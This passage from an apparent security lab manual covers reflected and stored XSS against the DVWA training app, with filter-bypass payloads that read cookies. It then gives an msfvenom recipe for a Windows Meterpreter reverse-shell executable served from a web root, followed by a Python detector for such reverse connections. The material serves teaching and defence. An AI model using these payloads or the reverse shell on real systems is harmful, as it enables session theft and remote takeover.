o Understand the Input Field: on the page, you will see a form where you can input data. This input is not sanitized, meaning it will be reflected directly back into the page when you submit it.
o Inject a Malicious Script: in the input field, enter the simple XSS payload from Step 1.
Step 2: For document.cookie use the command <script>alert(document.cookie)</script>

XSS (Reflected) Vulnerability (Medium)
At the medium level, DVWA applies basic input sanitization. However, this sanitization can still be bypassed using various encoding techniques or by injecting the script in a more complex manner.
o Attempt Injection with Basic Script: try to inject a basic script as before:
<script>alert('XSS Attack!');</script>
o In most cases, at the medium level, DVWA might escape certain characters or sanitize the input to prevent a simple attack like this.
o Use Encoding to Bypass Filters: to bypass basic sanitization, you can use URL encoding to encode characters like <, >, and " to their respective HTML entities.
Step 3: For High use command <body onload=alert(document.cookie)
o Verify Execution: if you see the alert, you've successfully bypassed the medium-level protections and executed a reflected XSS attack.

XSS (Stored):
At the easy level, DVWA does not sanitize or filter user input before storing it, making it easy to inject malicious scripts into the application.
Step 1: For Low use the command <script>alert(document.cookie)</script>
Understand the Input Field:
o On the page, you will see a form that allows you to submit a comment. This input is not sanitized, meaning it will be stored and reflected when viewed by other users.
Step 2. Inject a Malicious Script:
o In the comment field, enter the following XSS payload:
<script>alert('Stored XSS Attack!');</script>
Step 3. Submit the Comment:
o After submitting the form, you will see your comment reflected back on the page. The script will execute as soon as the page reloads.
Step 4. Verify Execution:
o If the alert box appears with the message Stored XSS Attack!, you have successfully exploited the stored XSS vulnerability.

XSS (Stored) Vulnerability (Medium)
At the medium level, DVWA applies basic input sanitization and filters to prevent common script injections. However, more advanced techniques can be used to bypass these protections.
 Attempt Simple Script Injection:
o Try submitting the same script payload as before:
<script>alert('Stored XSS Attack!');</script>
o At the medium level, DVWA likely filters out <script> tags and other common JavaScript payloads.
 Use Event Handlers or Encoded Payloads:
o Since simple tags are filtered, try using event handlers or encoded payloads. Use an onerror event with an image:
<img src="x" onerror="alert('Stored XSS Attack!')">
 Submit the Payload:
o After submitting the form, check if the script executes. In this case, the script should be executed when the image fails to load, triggering the onerror event.
 Verify Execution:
o If the alert appears, you've successfully bypassed the input sanitization at the medium level and executed a stored XSS attack.
Step 1: For Medium, right-click on the Name field and change maxlength to 250, then use the command <Script>alert(document.cookie)</sCRipt>

Conclusion: Penetration testing of DVWA provides valuable hands-on
experience in identifying, exploiting, and remediating common web application
vulnerabilities. It is an essential training tool for developers, security
professionals, and ethical hackers to build a deeper understanding of web
application security and enhance their ability to protect real-world systems from
similar threats.

Practical 18: Develop remote shell application using MSFVenom.

Aim:
To create a remote shell application payload using MSFVenom.

Step 1: Checking the IP address

For checking the IP address of the host machine, type the command in your terminal and remember the IP address:
ifconfig

Step 2: Payload creation

Now I will make a payload using msfvenom; the command is:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.165 LPORT=4444 -f exe > /var/www/html/door.exe
-p -> for payload
LHOST -> for configuring the system IP address
LPORT -> for configuring the port
-f -> for file type
> -> for saving the file in the given address

Step 3: Reverse Shell Creation
Now I will use the Metasploit framework to create a Meterpreter shell.
Type the given command in the terminal to start the Metasploit framework:
msfconsole

Step 4: For creating a meterpreter shell in the Metasploit framework:

use multi/handler
Now I have to set the payload that I gave when making the msfvenom payload:
set payload windows/x64/meterpreter/reverse_tcp
Configure the host IP for the reverse shell.
Type the given command to see the details of the given shell:
show options

Conclusion:
MSFVenom demonstrates the creation of effective payloads, highlighting the need for robust endpoint protection.
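The conclusion points at endpoint protection; one concrete signal a defender has is the reverse connection itself. The payload built above makes the victim open an outbound TCP session to LHOST on LPORT 4444 (Metasploit's default) from a process that has no business talking to the network. The added example below, not part of this manual or of Metasploit, parses constructed netstat-style lines (proto, local, remote, state, PID and process name joined on one line) and flags established outbound sessions by handler port and by unexpected process. The port list and the allow-list of expected network clients are assumptions to tune per environment.

```python
import re
from collections import namedtuple

Conn = namedtuple("Conn", "proto local remote state pid process")

# Assumed: ports commonly seen as handler LPORTs in labs and defaults (4444 is Metasploit's).
SUSPICIOUS_PORTS = {4444, 4445, 1337, 31337}
# Assumed: processes expected to hold outbound sessions on this host.
EXPECTED_NET_PROCESSES = {"chrome.exe", "msedge.exe", "svchost.exe", "outlook.exe"}

# Constructed sample in the shape of `netstat -ano` with the owning process appended.
SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID   Process
  TCP    192.168.0.23:49710     192.168.0.165:4444     ESTABLISHED     5124  door.exe
  TCP    192.168.0.23:49712     203.0.113.10:443       ESTABLISHED     3320  chrome.exe
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908   svchost.exe
  TCP    192.168.0.23:49720     192.168.0.165:4444     ESTABLISHED     3320  chrome.exe
"""

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\S+)\s*$")


def parse_netstat(text: str):
    """Turn the table into Conn tuples, skipping headers and anything that does not match."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            conns.append(Conn(m.group(1), m.group(2), m.group(3), m.group(4),
                              int(m.group(5)), m.group(6)))
    return conns


def remote_port(addr: str) -> int:
    return int(addr.rsplit(":", 1)[1])


def find_reverse_shell_candidates(text: str):
    """Return (pid, process, remote, reasons) for each established session worth triage."""
    findings = []
    for c in parse_netstat(text):
        if c.proto != "TCP" or c.state != "ESTABLISHED":
            continue
        reasons = []
        port = remote_port(c.remote)
        if port in SUSPICIOUS_PORTS:
            reasons.append(f"remote port {port} is a common handler port")
        if c.process.lower() not in EXPECTED_NET_PROCESSES:
            reasons.append(f"{c.process} is not an expected network client")
        if reasons:
            findings.append((c.pid, c.process, c.remote, reasons))
    return findings
```

Port-based matching alone misses a handler on 443, which is why the second rule keys on the process: a session from an unknown executable to any port deserves the same look, and a known browser talking to a handler port (the last sample line) is still reported.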
